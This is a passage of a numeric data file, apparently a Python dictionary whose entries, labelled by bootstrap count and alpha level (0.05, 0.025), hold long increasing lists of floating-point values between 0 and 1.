0.7040464172363338, 0.7050651855468807, 0.7060840148925839, 0.7071029663085996, 0.7081220397949277, 0.7091412353515684, 0.7101605529785214, 0.711179992675787, 0.7121994934082089, 0.7132191772460995, 0.7142389221191464, 0.7152587890625058, 0.7162787780761777, 0.717298889160162, 0.7183191833496151, 0.7193395385742244, 0.72035995483399, 0.7213805541992243, 0.7224012756347712, 0.7234221191406306, 0.7244430847168024, 0.7254641723632868, 0.7264853210449272, 0.7275066528320365, 0.7285281066894583, 0.7295496826171927, 0.7305713195800833, 0.7315931396484426, 0.7326150817871144, 0.7336371459960987, 0.7346593322753955, 0.7356816406250047, 0.7367040710449265, 0.7377266235351608, 0.7387492980957077, 0.7397721557617233, 0.740795074462895, 0.7418181762695356, 0.7428413391113323, 0.7438646850585978, 
0.7448881530761758, 0.7459117431640664, 0.7469355163574257, 0.7479593505859413, 0.7489833679199255, 0.7500074462890659, 0.7510317077636751, 0.7520561523437531, 0.7530806579589874, 0.7541053466796904, 0.755130157470706, 0.756155090332034, 0.7571801452636745, 0.7582053833007837, 0.7592307434082054, 0.7602562255859396, 0.7612818908691427, 0.762307617187502, 0.7633335876464861, 0.7643596191406264, 0.7653858337402356, 0.7664121704101573, 0.7674386901855478, 0.7684653320312508, 0.7694920959472663, 0.7705190429687506, 0.7715461120605475, 0.7725733642578131, 0.7736007385253911, 0.7746282348632817, 0.7756559143066409, 0.776683776855469, 0.7777117614746095, 0.7787398681640626, 0.7797681579589845, 0.7807966308593751, 0.7818252258300783, 0.7828540039062502, 0.7838829040527345, 0.7849119873046876, 0.7859411926269532, 0.7869705810546875, 0.7880001525878907, 0.7890299072265625, 0.7900597839355469, 0.7910897827148436, 0.7921200256347655, 0.7931503906249998, 0.794180938720703, 0.7952116699218748, 0.7962425231933591, 0.7972735595703121, 0.7983047790527339, 0.7993361816406245, 0.8003677673339838, 0.8013994750976556, 0.8024314270019525, 0.8034635009765617, 0.8044957580566398, 0.8055281982421866, 0.8065608215332022, 0.8075936279296864, 0.8086266174316393, 0.8096597900390611, 0.8106932067871079, 0.8117267456054672, 0.8127604675292952, 0.813794372558592, 0.8148285217285137, 0.815862792968748, 0.8168973083496073, 0.8179320068359354, 0.8189668884277322, 0.8200019531249979, 0.8210372619628884, 0.8220726928710914, 0.8231084289550757, 0.8241442871093726, 0.8251803894042945, 0.8262166748046852, 0.8272532043457009, 0.8282899169921852, 0.8293268127441383, 0.8303639526367165, 0.8314012756347634, 0.8324388427734353, 0.8334766540527322, 0.8345146484374978, 0.8355528869628884, 0.8365913085937479, 0.8376299743652321, 0.8386688842773414, 0.8397080383300758, 0.8407473754882789, 0.841786956787107, 0.8428267822265602, 0.8438668518066382, 0.8449071655273414, 0.8459476623535132, 0.8469884643554663, 
0.8480295104980443, 0.8490707397460912, 0.8501122741699192, 0.8511540527343723, 0.8521960754394503, 0.8532384033203096, 0.8542809143066378, 0.8553237304687472, 0.8563667907714815, 0.8574101562499971, 0.8584537658691377, 0.8594976196289034, 0.8605417785644504, 0.8615862426757785, 0.8626309509277316, 0.863675964355466, 0.8647212219238255, 0.8657667846679661, 0.866812652587888, 0.8678588256835912, 0.8689053039550755, 0.8699520874023411, 0.8709991149902317, 0.8720465087890599, 0.8730942077636693, 0.8741422119140599, 0.8751905212402318, 0.8762391967773412, 0.8772881774902318, 0.8783374633789036, 0.879387115478513, 0.8804371337890599, 0.881487457275388, 0.8825381469726538, 0.8835892028808568, 0.8846405639648413, 0.8856922912597632, 0.886744445800779, 0.887796905517576, 0.8888497924804667, 0.8899030456542949, 0.8909566650390605, 0.89201071166992, 0.8930651245117168, 0.8941199645996075, 0.8951751708984357, 0.8962308654785137, 0.8972869262695294, 0.8983434143066388, 0.899400329589842, 0.900457733154295, 0.9015155639648419, 0.9025738220214824, 0.903632568359373, 0.9046917419433572, 0.9057514648437478, 0.906811614990232, 0.9078722534179663, 0.9089334411621067, 0.9099951171874973, 0.9110572814941379, 0.9121199951171847, 0.9131832580566378, 0.9142470703124973, 0.9153114318847629, 0.9163763427734348, 0.9174418640136691, 0.9185079345703097, 0.9195746765136691, 0.9206419677734347, 0.9217098693847627, 0.9227784423828097, 0.9238476867675752, 0.9249175415039033, 0.9259881286621064, 0.9270593872070282, 0.9281313781738249, 0.9292041015624966, 0.9302774963378871, 0.9313517456054652, 0.9324267272949184, 0.9335025024414026, 0.9345790710449183, 0.9356565551757777, 0.9367348327636683, 0.9378140258789026, 0.9388941345214806, 0.9399751586914024, 0.941057098388668, 0.9421400756835899, 0.9432240905761681, 0.9443091430664025, 0.9453952331542931, 0.9464824218749962, 0.9475708312988242, 0.9486603393554648, 0.9497511291503867, 0.95084320068359, 0.9519365539550743, 0.9530312499999961, 
0.9541274108886679, 0.9552249755859336, 0.9563241271972618, 0.9574248046874961, 0.9585271301269492, 0.9596312255859335, 0.9607370910644492, 0.9618448486328085, 0.9629546203613241, 0.964066406249996, 0.9651803894042928, 0.9662966308593709, 0.9674153137206989, 0.9685365600585895, 0.969660491943355, 0.9707873535156205, 0.9719172058105424, 0.9730503540039018, 0.9741870422363237, 0.9753275146484331, 0.976472015380855, 0.9776209716796831, 0.9787746887206988, 0.9799337158203082, 0.9810985412597611, 0.9822698364257768, 0.9834483337402299, 0.9846350097656206, 0.9858310241699174, 0.987037719726558, 0.9882571716308547, 0.9894917602539016, 0.9907451477050735, 0.9920223388671828, 0.9933315124511671, 0.9946865234374952, 0.9961158752441358, 0.9977000732421827], 'num_bt = 1000, alpha = 0.05,': [5.1300048828125e-05, 0.00035546875, 0.0008181457519531249, 0.001367431640625, 0.0019721374511718747, 0.002616149902343749, 0.0032897644042968735, 0.003986877441406248, 0.0047030334472656235, 0.005435119628906249, 0.006180877685546875, 0.006938415527343749, 0.007706207275390624, 0.008483215332031249, 0.009268402099609375, 0.010061035156249998, 0.010860321044921874, 0.011665710449218752, 0.012476776123046877, 0.013293029785156254, 0.01411404418945313, 0.014939575195312506, 0.015769256591796878, 0.016602905273437503, 0.017440155029296876, 0.0182808837890625, 0.019124908447265623, 0.01997198486328125, 0.020821990966796877, 0.0216748046875, 0.022530242919921874, 0.02338818359375, 0.024248565673828125, 0.0251112060546875, 0.02597610473632813, 0.02684307861328126, 0.02771206665039063, 0.028583007812500005, 0.029455841064453134, 0.03033050537109376, 0.03120687866210939, 0.03208489990234376, 0.03296456909179689, 0.03384582519531252, 0.0347286071777344, 0.03561279296875002, 0.03649844360351565, 0.03738549804687503, 0.038273895263671906, 0.03916351318359378, 0.04005447387695316, 0.04094659423828129, 0.04183999633789067, 0.04273449707031255, 0.04363015747070318, 0.04452685546875006, 
0.04542471313476568, 0.046323608398437556, 0.04722348022460943, 0.048124389648437564, 0.04902621459960944, 0.04992907714843756, 0.0508327941894532, 0.05173748779296882, 0.052643035888671946, 0.053549438476562565, 0.05445669555664069, 0.05536480712890631, 0.05627371215820319, 0.05718347167968756, 0.05809396362304694, 0.05900524902343756, 0.05991732788085944, 0.06083007812500007, 0.06174356079101569, 0.06265783691406254, 0.06357272338867193, 0.06448834228515629, 0.06540463256835943, 0.0663215942382813, 0.06723916625976567, 0.0681574096679688, 0.06907632446289066, 0.06999578857421879, 0.07091592407226566, 0.0718366088867188, 0.07275790405273444, 0.07367980957031256, 0.07460226440429693, 0.07552526855468755, 0.07644888305664069, 0.07737298583984381, 0.07829763793945319, 0.07922283935546881, 0.08014852905273445, 0.08107476806640634, 0.08200155639648449, 0.08292877197265636, 0.08385653686523448, 0.08478479003906261, 0.08571347045898448, 0.08664270019531259, 0.08757235717773446, 0.08850244140625008, 0.08943307495117195, 0.09036407470703131, 0.09129556274414069, 0.09222747802734382, 0.09315982055664071, 0.09409265136718759, 0.09502584838867195, 0.09595947265625007, 0.09689352416992195, 0.09782800292968757, 0.0987628479003907, 0.09969812011718757, 0.1006338195800782, 0.10156982421875008, 0.10250631713867195, 0.10344311523437508, 0.10438034057617196, 0.10531793212890633, 0.10625588989257823, 0.10719415283203138, 0.10813284301757825, 0.10907189941406262, 0.1100113220214845, 0.11095104980468765, 0.11189114379882828, 0.1128316040039064, 0.11377243041992202, 0.11471350097656266, 0.11565499877929702, 0.11659680175781265, 0.11753890991210952, 0.11848138427734389, 0.11942416381835952, 0.1203672485351564, 0.12131063842773454, 0.12225439453125017, 0.12319839477539082, 0.12414276123046897, 0.1250874328613284, 0.12603234863281282, 0.1269776306152347, 0.12792315673828158, 0.12886904907226598, 0.12981518554687538, 0.13076162719726603, 0.13170831298828167, 0.13265536499023484, 
0.133602661132813, 0.13455020141601615, 0.13549804687500056, 0.13644619750976617, 0.13739459228515677, 0.13834323120117237, 0.13929223632812548, 0.1402414245605474, 0.14119091796875055, 0.1421406555175787, 0.14309063720703186, 0.14404092407226626, 0.14499145507812566, 0.14594223022461006, 0.14689324951171945, 0.14784451293945383, 0.14879608154296942, 0.1497478332519538, 0.15069989013671942, 0.15165219116211004, 0.15260467529296945, 0.15355746459961006, 0.15451043701171946, 0.15546371459961006, 0.15641717529296945, 0.15737088012695383, 0.1583248291015632, 0.15927902221679757, 0.160233459472657, 0.16118807983398514, 0.1621429443359383, 0.16309805297851643, 0.16405340576171956, 0.16500894165039143, 0.1659647216796883, 0.16692068481445393, 0.16787689208984458, 0.1688333435058602, 0.16978997802734463, 0.1707467956542978, 0.1717039184570322, 0.17266116333007908, 0.17361865234375096, 0.17457638549804783, 0.17553430175781348, 0.17649240112304787, 0.1774507446289073, 0.17840927124023548, 0.17936804199218864, 0.18032699584961054, 0.18128613281250117, 0.18224545288086058, 0.183205017089845, 0.18416476440429813, 0.18512469482422, 0.1860848083496106, 0.1870451660156262, 0.1880057067871106, 0.1889664306640637, 0.18992733764648562, 0.19088842773437625, 0.19184976196289188, 0.19281121826172004, 0.1937729187011732, 0.1947347412109388, 0.19569680786132942, 0.19665905761718883, 0.19762149047851696, 0.19858404541015756, 0.19954684448242316, 0.20050982666015754, 0.20147299194336066, 0.20243627929687624, 0.20339981079101682, 0.20436346435546993, 0.20532736206054802, 0.20629138183593865, 0.20725558471679806, 0.20822003173828246, 0.20918460083007934, 0.21014929199218874, 0.21111422729492313, 0.21207928466797, 0.21304458618164185, 0.21401000976562623, 0.21497561645507934, 0.21594134521484498, 0.21690731811523561, 0.21787341308593877, 0.21883969116211066, 0.21980609130859508, 0.22077267456054822, 0.2217394409179701, 0.2227063903808607, 0.22367346191406384, 0.2246407165527357, 
0.2256081542968763, 0.22657571411132943, 0.22754345703125134, 0.22851138305664198, 0.22947943115234515, 0.23044766235351705, 0.23141601562500147, 0.23238455200195463, 0.2333532714843765, 0.23432211303711092, 0.2352910766601578, 0.23626028442382968, 0.23722955322265782, 0.23819906616211095, 0.23916864013672035, 0.24013845825195473, 0.24110833740234539, 0.24207846069336103, 0.24304864501953294, 0.24401901245117358, 0.244989562988283, 0.2459602355957049, 0.24693109130859553, 0.24790206909179868, 0.2488731689453143, 0.24984445190429871, 0.25081585693359565, 0.25178744506836126, 0.2527591552734394, 0.25373098754883006, 0.2547030029296894, 0.25567514038086125, 0.2566474609375019, 0.2576198425292988, 0.25859246826172066, 0.2595651550292988, 0.2605380249023457, 0.261511016845705, 0.2624841918945331, 0.26345742797851746, 0.2644308471679705, 0.2654044494628923, 0.2663781738281267, 0.2673519592285173, 0.26832598876953284, 0.26930007934570466, 0.27027435302734526, 0.2712487487792984, 0.27222326660156404, 0.27319796752929837, 0.27417272949218896, 0.27514767456054834, 0.27612274169922024, 0.27709799194336093, 0.2780733032226579, 0.2790487976074235, 0.28002441406250167, 0.28100015258789235, 0.2819760742187517, 0.2829520568847673, 0.2839282226562517, 0.28490451049804866, 0.285880920410158, 0.28685745239257987, 0.28783410644531426, 0.28881094360351733, 0.28978784179687667, 0.2907649230957048, 0.29174212646484543, 0.2927194519042985, 0.29369689941406407, 0.2946744689941422, 0.2956521606445328, 0.29662997436523586, 0.2976079711914077, 0.2985860290527358, 0.2995642700195327, 0.3005426330566421, 0.301521118164064, 0.3024996643066421, 0.303478393554689, 0.30445724487304837, 0.3054362182617203, 0.30641531372070474, 0.3073945312500017, 0.3083738708496111, 0.30935339355468927, 0.3103329772949237, 0.31131268310547067, 0.31229251098633004, 0.3132725219726582, 0.3142525939941426, 0.3152327880859396, 0.31621310424804894, 0.3171936035156271, 0.3181741638183615, 0.31915484619140844, 
0.3201356506347678, 0.3211166381835959, 0.3220976867675803, 0.32307885742187725, 0.3240601501464866, 0.32504156494140846, 0.32602310180664285, 0.32700476074218976, 0.3279865417480491, 0.32896844482422094, 0.3299504699707053, 0.3309326171875022, 0.33191488647461165, 0.33289721679687734, 0.3338797302246117, 0.3348623657226586, 0.33584506225586175, 0.3368278808593774, 0.3378108825683619, 0.3387939453125026, 0.33977713012695576, 0.34076043701172143, 0.3417438659667996, 0.34272741699219034, 0.34371109008789347, 0.34469482421875286, 0.34567874145508104, 0.3466627197265655, 0.34764682006836245, 0.3486311035156281, 0.34961544799805, 0.35059991455078443, 0.3515844421386751, 0.3525691528320345, 0.3535539855957064, 0.35453887939453455, 0.3555238952636752, 0.3565090332031283, 0.35749429321289394, 0.3584796752929721, 0.35946517944336276, 0.3604507446289097, 0.3614364929199253, 0.36242230224609717, 0.36340823364258157, 0.3643942871093785, 0.36538046264648794, 0.36636669921875364, 0.36735311889648803, 0.3683395996093787, 0.36932620239258185, 0.37031292724609755, 0.3712997131347695, 0.37228668212891025, 0.37327371215820726, 0.3742608642578167, 0.37524813842773863, 0.3762355346679731, 0.37722299194336384, 0.37821063232422325, 0.3791983337402389, 0.3801861572265671, 0.38117410278320785, 0.38216210937500483, 0.38315023803711423, 0.3841385498046924, 0.3851268615722706, 0.3861153564453176, 0.38710397338867697, 0.3880926513671926, 0.3890814514160208, 0.3900703735351615, 0.39105935668945846, 0.3920485229492241, 0.393037750244146, 0.3940270996093804, 0.3950165100097711, 0.3960061035156305, 0.3969957580566461, 0.39798553466797426, 0.39897543334961494, 0.3999653930664119, 0.40095547485352123, 0.4019456787109431, 0.4029360046386775, 0.40392645263672444, 0.4049169616699275, 0.4059075927734431, 0.40689834594727126, 0.40788916015625565, 0.4088801574707087, 0.40987121582031805, 0.41086233520508364, 0.411853637695318, 0.41284500122070866, 0.4138364868164117, 0.4148280944824273, 
0.41581976318359914, 0.4168115539550835, 0.4178034667968804, 0.4187955017089898, 0.4197875976562555, 0.42077987670898986, 0.4217721557617242, 0.42276461791992737, 0.4237571411132868, 0.4247497863769587, 0.42574255371094316, 0.42673544311524014, 0.4277283935546933, 0.42872146606445893, 0.4297146606445371, 0.43070791625977156, 0.43170129394531853, 0.4326947937011779, 0.43368835449219356, 0.434682098388678, 0.4356759033203187, 0.43666976928711565, 0.4376638183593813, 0.4386579284668032, 0.4396521606445376, 0.4406464538574283, 0.44164093017578765, 0.4426354675293033, 0.44363006591797516, 0.44462484741211583, 0.44561968994141277, 0.4466146545410221, 0.4476096801757877, 0.44860482788086586, 0.4496000976562565, 0.4505954895019596, 0.45159094238281894, 0.4525865173339908, 0.4535822143554752, 0.4545780334472721, 0.45557391357422516, 0.45656991577149075, 0.4575659790039126, 0.45856222534180324, 0.45955853271485014, 0.4605549011230532, 0.46155145263672503, 0.46254806518555314, 0.46354479980469376, 0.46454159545899065, 0.4655385742187562, 0.4665355529785218, 0.46753271484375614, 0.46852993774414675, 0.4695272827148498, 0.47052474975586533, 0.4715223388671934, 0.47251998901367775, 0.4735177612304746, 0.47451559448242775, 0.4755135498046934, 0.47651162719727147, 0.47750982666016206, 0.4785080871582089, 0.4795064697265683, 0.4805049743652402, 0.48150354003906837, 0.4825022888183653, 0.4835010375976623, 0.4844999694824279, 0.4854989624023498, 0.4864980773925842, 0.48749731445313116, 0.48849661254883425, 0.48949603271484987, 0.490495574951178, 0.4914951782226624, 0.4924949645996155, 0.4934947509765686, 0.49449472045899046, 0.4954947509765686, 0.49649490356445924, 0.4974951782226623, 0.49849551391602165, 0.49949603271484977, 0.5004965515136779, 0.5014972534179748, 0.5024980163574279, 0.5034989013671934, 0.5044999084472716, 0.5055009765625059, 0.5065021667480528, 0.5075034790039122, 0.5085048522949279, 0.5095064086914122, 0.5105080261230527, 0.5115097045898495, 0.512511566162115, 
0.5135134887695368, 0.5145154724121149, 0.5155176391601618, 0.5165198669433649, 0.5175222167968806, 0.5185246887207087, 0.519527221679693, 0.5205298767089898, 0.521532653808599, 0.5225355529785208, 0.5235385131835989, 0.5245415954589895, 0.5255447998046926, 0.526548065185552, 0.5275514526367239, 0.5285549621582083, 0.5295585937500052, 0.5305622863769585, 0.5315661010742242, 0.5325700378418023, 0.533574096679693, 0.5345782165527398, 0.5355824584960992, 0.5365868225097711, 0.5375913085937555, 0.5385958557128961, 0.5396005249023493, 0.540605316162115, 0.541610168457037, 0.5426152038574278, 0.5436203002929748, 0.5446255187988344, 0.5456307983398502, 0.5466361999511784, 0.5476417236328189, 0.5486473693847721, 0.5496531372070378, 0.5506589660644597, 0.5516649169921942, 0.5526709899902412, 0.5536771850586008, 0.5546834411621165, 0.5556898193359447, 0.5566963195800853, 0.5577029418945384, 0.5587096252441478, 0.559716491699226, 0.5607234191894604, 0.5617304077148512, 0.5627375793457107, 0.5637448120117264, 0.5647522277832108, 0.5657597045898514, 0.5667672424316482, 0.5677749633789139, 0.5687827453613358, 0.5697906494140702, 0.5707986755371172, 0.5718068237304766, 0.5728150329589924, 0.5738234252929767, 0.5748318786621173, 0.5758404541015704, 0.576849151611336, 0.5778579101562579, 0.5788668518066485, 0.5798758544921955, 0.5808849792480549, 0.5818942260742268, 0.5829035339355548, 0.5839130249023515, 0.5849225769043046, 0.5859322509765702, 0.5869420471191483, 0.587951965332039, 0.5889620056152421, 0.5899721679687578, 0.5909823913574297, 0.5919927368164138, 0.5930032043457106, 0.59401379394532, 0.5950245056152418, 0.5960353393554761, 0.5970462341308668, 0.5980573120117262, 0.5990684509277419, 0.60007971191407, 0.6010910949707106, 0.6021026000976636, 0.6031142272949291, 0.604125915527351, 0.6051377868652416, 0.6061497192382884, 0.6071618347168041, 0.6081740112304759, 0.6091863098144602, 0.610198730468757, 0.6112112731933662, 0.612223937988288, 0.6132366638183661, 
0.6142495727539129, 0.6152626037597723, 0.6162756958007879, 0.6172889709472721, 0.6183023071289125, 0.6193157653808655, 0.6203294067382873, 0.6213431091308653, 0.6223569335937559, 0.623370880126959, 0.6243849487304746, 0.6253991394043026, 0.6264134521484431, 0.6274278869628961, 0.6284424438476616, 0.6294571228027396, 0.6304719238281301, 0.6314867858886769, 0.6325018310546925, 0.6335169982910206, 0.6345322875976612, 0.6355476989746144, 0.6365631713867238, 0.6375788269043019, 0.6385946044921925, 0.6396105041503956, 0.6406265258789111, 0.6416426086425829, 0.6426588745117235, 0.6436752624511767, 0.6446917724609423, 0.6457084045410205, 0.6467251586914112, 0.6477420349121145, 0.6487590942382864, 0.6497762145996144, 0.6507934570312549, 0.6518108825683643, 0.6528283691406299, 0.6538459777832081, 0.654863769531255, 0.6558816833496145, 0.6568997192382864, 0.6579178161621144, 0.6589361572265674, 0.6599545593261767, 0.6609730834960986, 0.661991729736333, 0.6630105590820362, 0.6640294494628957, 0.6650485229492238, 0.6660677185058644, 0.6670870361328175, 0.6681064758300831, 0.6691260986328175, 0.6701457824707081, 0.6711656494140675, 0.6721856384277394, 0.6732057495117237, 0.6742259826660205, 0.6752463989257861, 0.6762669372558642, 0.6772875366210985, 0.6783083801269579, 0.6793292846679736, 0.6803503112793017, 0.6813715209960985, 0.6823928527832078, 0.6834143676757859, 0.6844359436035202, 0.6854577026367233, 0.686479583740239, 0.6875016479492232, 0.6885237731933637, 0.6895460815429729, 0.690568572998051, 0.6915911254882853, 0.6926138610839884, 0.693636718750004, 0.6946597595214882, 0.6956829223632849, 0.6967062072753941, 0.6977296142578159, 0.6987532043457064, 0.6997769775390658, 0.7008008117675814, 0.7018248291015655, 0.7028490295410185, 0.7038733520507839, 0.7048977966308619, 0.7059224243164087, 0.706947174072268, 0.7079720458984398, 0.7089971008300803, 0.7100223388671895, 0.7110476989746112, 0.7120731811523454, 0.7130988464355484, 0.714124633789064, 0.7151506042480481, 
0.7161766967773447, 0.7172029724121102, 0.7182293701171881, 0.7192559509277349, 0.7202827148437504, 0.7213096008300784, 0.722336608886719, 0.7233638000488284, 0.7243911743164064, 0.725418670654297, 0.7264463500976562, 0.7274742126464843, 0.7285021972656248, 0.7295303649902342, 0.730558654785156, 0.7315871276855467, 0.7326157836914061, 0.733644561767578, 0.7346735229492186, 0.7357026672363279, 0.736731994628906, 0.7377614440917967, 0.7387910766601561, 0.7398208923339842, 0.7408508300781248, 0.7418809509277341, 0.7429112548828122, 0.743941741943359, 0.7449724121093747, 0.7460032043457028, 0.7470341796874996, 0.7480653381347652, 0.7490966796874995, 0.7501282043457026, 0.7511599121093744, 0.752191802978515, 0.7532238159179679, 0.754256072998046, 0.7552884521484365, 0.7563210144042959, 0.7573538208007801, 0.7583867492675768, 0.7594198608398423, 0.7604532165527328, 0.7614866943359359, 0.7625203552246076, 0.7635542602539044, 0.7645882873535136, 0.7656225585937478, 0.7666569519042946, 0.7676915893554664, 0.7687264099121071, 0.7697614135742165, 0.7707966613769507, 0.7718320312499974, 0.7728676452636692, 0.7739034423828098, 0.7749394226074192, 0.7759755859374974, 0.7770119934082006, 0.7780485839843725, 0.7790853576660132, 0.7801223754882788, 0.7811595153808569, 0.7821969604492164, 0.7832345275878883, 0.7842723999023414, 0.785310394287107, 0.7863486328124977, 0.7873870544433571, 0.7884257202148414, 0.7894646301269507, 0.7905037231445288, 0.7915429992675757, 0.7925825195312475, 0.7936222839355443, 0.7946622314453099, 0.7957024230957005, 0.7967428588867161, 0.7977834777832004, 0.7988243408203096, 0.7998654479980439, 0.800906738281247, 0.8019482727050751, 0.8029901123046844, 0.8040320739746062, 0.8050743408203093, 0.8061168518066374, 0.8071595458984343, 0.8082025451660124, 0.8092457275390593, 0.8102892150878874, 0.8113328857421843, 0.8123768615722625, 0.8134210205078095, 0.8144654846191377, 0.8155101928710907, 0.8165551452636689, 0.8176003417968721, 0.8186458435058565, 
0.8196915283203096, 0.820737518310544, 0.8217838134765597, 0.822830291748044, 0.8238770751953096, 0.8249241638183565, 0.8259714965820284, 0.8270190734863253, 0.8280669555664034, 0.8291151428222628, 0.8301635742187471, 0.8312123107910127, 0.8322612915039033, 0.8333106384277313, 0.8343602294921845, 0.8354100646972625, 0.8364602661132782, 0.8375107727050751, 0.838561523437497, 0.8396125793457002, 0.8406640014648409, 0.8417156677246066, 0.8427677001953099, 0.8438200378417943, 0.84487268066406, 0.845925628662107, 0.8469788818359352, 0.8480325012207007, 0.8490864257812477, 0.850140716552732, 0.8511953124999977, 0.8522502746582009, 0.8533055419921852, 0.8543611755371071, 0.8554171752929666, 0.8564734802246071, 0.8575302124023415, 0.8585872497558572, 0.8596446533203103, 0.8607024230957009, 0.8617606201171851, 0.8628191223144507, 0.8638780517578101, 0.8649373474121068, 0.8659970092773411, 0.8670570983886692, 0.8681175537109348, 0.8691784362792941, 0.8702396850585908, 0.8713013610839814, 0.8723634643554657, 0.8734259948730438, 0.8744889526367157, 0.8755523376464812, 0.8766161499023407, 0.8776803894042938, 0.8787450561523408, 0.8798102111816376, 0.8808758544921845, 0.8819419250488251, 0.8830084838867157, 0.8840754699707, 0.8851430053710906, 0.8862109680175748, 0.8872794799804654, 0.8883484802246059, 0.8894179687499965, 0.8904880065917932, 0.89155853271484, 0.8926296081542929, 0.8937012329101522, 0.8947733459472614, 0.8958460693359331, 0.8969194030761675, 0.8979932250976518, 0.8990676574706985, 0.9001427001953078, 0.9012183532714797, 0.9022945556640579, 0.9033714294433547, 0.9044489135742141, 0.9055270690917921, 0.9066058349609326, 0.9076853332519482, 0.9087654418945262, 0.9098462829589792, 0.910927795410151, 0.9120100402831978, 0.9130929565429634, 0.9141766662597602, 0.9152611694335884, 0.9163464050292917, 0.9174323730468698, 0.9185191955566353, 0.9196068725585883, 0.9206953430175725, 0.9217846679687444, 0.9228748474121037, 0.9239659423828069, 0.9250579528808539, 
0.9261508789062446, 0.927244720458979, 0.9283395996093696, 0.9294354553222602, 0.9305323486328071, 0.9316302795410102, 0.9327292480468697, 0.933829376220698, 0.9349306030273384, 0.9360329895019478, 0.9371365966796822, 0.9382414245605416, 0.9393475341796821, 0.9404549255371039, 0.9415635986328069, 0.9426737365722601, 0.943785278320307, 0.9448982849121038, 0.946012817382807, 0.9471288757324162, 0.9482465820312442, 0.9493659973144474, 0.9504871215820254, 0.9516100769042911, 0.9527348632812441, 0.9538616638183534, 0.954990478515619, 0.9561213684081972, 0.9572545166015566, 0.958389923095697, 0.9595277709960878, 0.9606681213378846, 0.9618111572265564, 0.9629569396972596, 0.9641056518554628, 0.9652574768066347, 0.966412597656244, 0.9675711364746035, 0.9687333984374941, 0.9698995056152283, 0.9710698852539001, 0.9722447204589783, 0.9734243774414001, 0.9746092224121033, 0.9757997436523377, 0.9769964294433534, 0.9781998901367127, 0.9794107360839782, 0.9806298217773376, 0.9818581237792906, 0.9830968017578062, 0.9843474426269468, 0.9856117553710874, 0.9868923034667906, 0.988192199707025, 0.9895158996581969, 0.9908700561523373, 0.9922647399902279, 0.9937177124023372, 0.9952649841308528, 0.9970087280273371], 'num_bt = 1000, alpha = 0.025': [2.5299072265625002e-05, 0.00024230957031250004, 0.0006191101074218749, 0.0010908813476562499, 0.0016253967285156249, 0.0022049560546874994, 0.002818878173828124, 0.0034599609374999984, 0.004123382568359373, 0.004805480957031248, 0.005503570556640623, 0.006215515136718748, 0.006939605712890622, 0.007674499511718747, 0.008419036865234372, 0.009172302246093746, 0.00993350219726562, 0.010701965332031247, 0.011477020263671874, 0.01225823974609375, 0.013045196533203126, 0.013837402343750003, 0.014634552001953127, 0.015436401367187505, 0.01624252319335938, 0.01705279541015626, 0.017866912841796888, 0.018684692382812514, 0.01950595092773439, 0.020330505371093766, 0.021158172607421893, 0.02198883056640627, 0.022822357177734398, 0.023658630371093774, 
0.0244975280761719, 0.025338928222656272, 0.0261827087402344, 0.02702880859375003, 0.027877166748046904, 0.028727600097656278, 0.029580169677734407, 0.03043469238281253, 0.03129116821289066, 0.03214947509765629, 0.03300961303710941, 0.033871520996093786, 0.03473507690429691, 0.03560028076171879, 0.03646707153320316, 0.03733538818359378, 0.038205230712890656, 0.039076538085937536, 0.03994924926757815, 0.04082336425781253, 0.0416988220214844, 0.04257556152343753, 0.0434535827636719, 0.04433288574218753, 0.04521334838867191, 0.046095031738281285, 0.04697787475585941, 0.04786187744140629, 0.048746917724609415, 0.04963311767578129, 0.05052029418945316, 0.051408569335937536, 0.052297821044921915, 0.05318811035156253, 0.05407931518554691, 0.054971496582031286, 0.055864654541015656, 0.05675866699218753, 0.057653594970703166, 0.05854943847656254, 0.05944613647460942, 0.06034368896484379, 0.06124203491210941, 0.06214123535156253, 0.06304122924804689, 0.06394195556640625, 0.06484353637695311, 0.06574584960937499, 0.06664895629882814, 0.067552734375, 0.06845730590820315, 0.06936254882812501, 0.07026846313476565, 0.07117510986328127, 0.0720824890136719, 0.07299047851562504, 0.07389913940429693, 0.07480847167968757, 0.0757184143066407, 0.07662896728515634, 0.0775401916503907, 0.07845202636718757, 0.07936447143554692, 0.0802775268554688, 0.08119113159179692, 0.08210534667968755, 0.08302011108398444, 0.08393548583984381, 0.08485134887695317, 0.08576782226562504, 0.08668484497070317, 0.08760235595703128, 0.08852041625976564, 0.08943902587890629, 0.09035812377929692, 0.0912777709960938, 0.09219790649414067, 0.09311853027343756, 0.09403964233398443, 0.09496130371093756, 0.09588339233398444, 0.0968059692382813, 0.09772897338867192, 0.0986525268554688, 0.09957650756835942, 0.1005009155273438, 0.10142581176757817, 0.1023511352539063, 0.10327688598632817, 0.10420312500000006, 0.10512979125976571, 0.10605682373046885, 0.10698434448242197, 0.10791223144531262, 0.10884054565429699, 
0.10976928710937511, 0.11069845581054699, 0.11162799072265636, 0.11255795288085949, 0.11348828125000013, 0.1144190368652345, 0.11535015869140638, 0.11628170776367203, 0.1172135620117189, 0.11814584350585955, 0.11907849121093769, 0.12001150512695333, 0.12094488525390645, 0.1218786315917971, 0.12281274414062524, 0.12374722290039086, 0.12468206787109398, 0.1256172180175784, 0.1265527343750003, 0.12748861694335972, 0.12842480468750034, 0.12936135864257847, 0.13029827880859407, 0.13123544311523466, 0.13217303466796904, 0.13311093139648467, 0.13404913330078155, 0.1349876403808597, 0.1359265136718753, 0.13686569213867217, 0.1378051757812503, 0.13874496459960967, 0.1396851196289065, 0.1406255187988284, 0.1415662841796878, 0.1425072937011722, 0.14344866943359408, 0.14439028930664094, 0.14533227539062532, 0.1462745056152347, 0.14721704101562533, 0.14815982055664095, 0.1491029663085941, 0.15004635620117224, 0.15099005126953163, 0.15193405151367223, 0.15287829589843788, 0.15382284545898478, 0.15476763916015668, 0.15571273803710983, 0.15665808105468798, 0.1576037292480474, 0.158549682617188, 0.1594958190917974, 0.16044226074218804, 0.16138900756835994, 0.16233599853515684, 0.16328323364257874, 0.16423071289062563, 0.16517849731445378, 0.16612652587890692, 0.16707479858398505, 0.16802331542968818, 0.1689720764160163, 0.16992114257812568, 0.17087045288086006, 0.17181994628906322, 0.17276974487304764, 0.17371978759765705, 0.17467007446289146, 0.1756205444335946, 0.176571319580079, 0.17752233886718838, 0.17847360229492276, 0.17942504882812588, 0.180376739501954, 0.18132873535156335, 0.18228091430664145, 0.1832333374023446, 0.18418594360351648, 0.1851388549804696, 0.18609194946289148, 0.18704528808593834, 0.1879988708496102, 0.1889526367187508, 0.18990664672851643, 0.19086090087890706, 0.19181533813476648, 0.1927700195312509, 0.1937249450683603, 0.19468005371093844, 0.1956353454589853, 0.19659094238281344, 0.1975467224121103, 0.19850268554687595, 0.1994588928222666, 
